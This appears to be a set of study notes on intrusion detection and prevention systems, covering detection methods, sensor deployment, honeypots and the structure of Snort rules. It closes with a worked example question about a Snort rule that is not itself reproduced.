Definition:

A deliberate unauthorised attempt to: access information, manipulate information, or render a system unreliable or unusable

Intrusions can be divided into 6 main types:

• Attempted break-ins, which are detected by atypical behaviour profiles or violations of security constraints.
• Masquerade attacks, which are detected by atypical behaviour profiles or violations of security constraints.
• Penetration of the security control system, which are detected by monitoring for specific patterns of activity.
• Leakage, which is detected by atypical use of system resources.
• Denial of service, which is detected by atypical use of system resources.
• Malicious use, which is detected by atypical behaviour profiles, violations of security constraints, or use of special privileges.

An Intrusion Detection System (IDS) is a lot like a Burglar Alarm. It reports an intrusion within the building, but can't stop the intruder making off with the loot.

IDS raises alarm to an administrator when it detects intrusions.

An Intrusion Protection System (IPS) is more like a Guard Dog. 

IPS Sensors typically triggers alarm, but can also provide an Active Response to an intrusion.

Positive Alert

• Alert raised due to identifying an activity deemed a possible intrusion
• Sometimes called an Event Of Interest (EOI)

Negative Alert

• Alert not raised due to identifying an activity as not an intrusion
• Activity deemed not an EOI

IDS does not always get this correct

The classification can also be TRUE or FALSE

• TRUE - Correct Classification
• FALSE - Incorrect Classification

Therefore, IDPS have to be tuned to maximise the number of True Positives whilst minimising the number of False Positives.

Detects Intrusions based on predefined Signature or Pattern of Known attacks or Misuse

• Signatures in simplest form are patterns which can be matched against activities being monitored
• String literal / regex pattern / Hex pattern
• Network IDS - Packet contents compared against signature database in an IDS Sensor
• Signature matches - raise alert
• Signatures could also be based on:
• Protocol, IP Addresses, Ports, Payload contents, State of connection

• Good for detecting known attacks
• Signature database must be kept up to date
• Typically low rates of false positives

• Poor detection of unknown attacks

Detects Intrusions based on anomalous/unexpected activities

• Abnormal activity - deviation from normal conditions - are identified as suspicious
• Normal Activities - Baseline profile monitoring activities

• Good for detecting unknown attacks

• Typically High rates of False Positives
• Difficult to create/keep up to date Baseline behaviour profiles

NIDS collect packets from network passively (copies the traffic).

They are deployed at aggregation points (Issues with traffic overwhelming sensor / reducing performance of switch).

Sensor Network Interface Cards (NIC) runs in Promiscuous mode. (Listens to all traffic - whether addresses to the sensor or not).

Deployment typically as an Out-of-line Sensor.

NIPS are typically deployed at the network perimeters - between 2 networks.

Behind the firewall is typical and can help with VPN traffic and tracing intrusions post NAT.

Deployment typically as an In-line Sensor at an aggregation point.

Sensor needs multiple Network Interface Cards (NIC) and traffic flows through the sensor, across networks.

Host only Network Traffic Monitoring

• HIDS monitor network traffic in non promiscuous mode on all interfaces.

System Integrity Verifiers (SIV)

• They can also monitor for changes to list of critical business/system files periodically. 
• HIDS Agent generates hash signatures, which it can compare to the file periodically to check its integrity.

Log File Monitors (LFM)

• Analysing log/audit files from OS/Applications/Devices by seeing if they match patterns or signatures

HIPS monitor host activities as they happen.

They use a Shim, a layer of code installed between other layers of code, to analyse the data passed between the layers of code. An example of this would be Cisco CSA.

A honeypot is a security tool that can help computer systems defend against cyber attacks in unique ways. This network-attached system is used as a decoy to distract cyber attackers from their real targets. Security analysts are able to gather information from these attacks to improve security policies and attempt to protect the real network.

Snort is an Open Source Intrusion Prevention System which uses a series of rules that help define malicious network activity and uses those rules to find packets that match against them, generating alerts for users.

Snort Rules have 2 parts, the header and the options.

The Rules Header consists of an action (i.e. log, alert), a protocol to match (i.e. IP, TCP, UDP, ICMP) and Source and Destination IP Addresses or Ranges, Ports and Direction of Packets.

The Rules Options are keywords or patterns to match on in contents, the how and where to match in the packet and an alert to output when the rule matches a packet.

The format of Snort Detection Rules are as follows:

action protocol src-ip src-port > dest-ip dest-port (packet-payload-params output-msg)

Example Question:

Regarding the below Snort detection rule, detail the layer 4 information which will be matched against network packets, and the payload signature being searched for?

Layer 4 protocol TCP and server port number 8888 are matched, and the Hex signature 00 0200 will be matched against the packet payload.